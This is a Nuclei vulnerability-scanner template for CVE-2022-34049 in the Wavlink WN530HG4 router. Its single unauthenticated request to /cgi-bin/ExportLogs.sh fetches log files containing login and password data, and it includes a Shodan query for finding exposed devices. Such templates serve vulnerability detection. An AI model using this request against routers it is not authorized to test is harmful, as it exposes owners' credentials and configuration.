nuclei-templates/http/cves/2022/CVE-2022-34049.yaml

54 lines
1.6 KiB
YAML
Raw Normal View History

2022-07-21 12:26:31 +00:00
id: CVE-2022-34049
info:
name: WAVLINK WN530HG4 - Improper Access Control
2022-07-21 12:26:31 +00:00
author: For3stCo1d
severity: medium
2022-07-21 12:26:31 +00:00
description: |
2023-02-03 21:31:29 +00:00
Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
2022-07-21 12:26:31 +00:00
reference:
- https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049
- https://drive.google.com/file/d/1ZeSwqu04OghLQXeG7emU-w-Amgadafqx/view?usp=sharing
- https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view?usp=sharing
- https://nvd.nist.gov/vuln/detail/CVE-2022-34049
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-34049
cwe-id: CWE-552
2023-08-31 11:46:18 +00:00
epss-score: 0.17531
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.95436
2022-07-21 12:26:31 +00:00
metadata:
max-request: 1
2022-07-21 12:26:31 +00:00
shodan-query: http.title:"Wi-Fi APP Login"
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: wavlink
product: wl-wn530hg4_firmware
2022-07-21 12:26:31 +00:00
tags: cve,cve2022,wavlink,router,exposure
http:
2022-07-21 12:26:31 +00:00
- raw:
- |
GET /cgi-bin/ExportLogs.sh HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Login'
- 'Password'
condition: and
- type: word
part: header
words:
- filename="sysLogs.txt"
- type: status
status:
- 200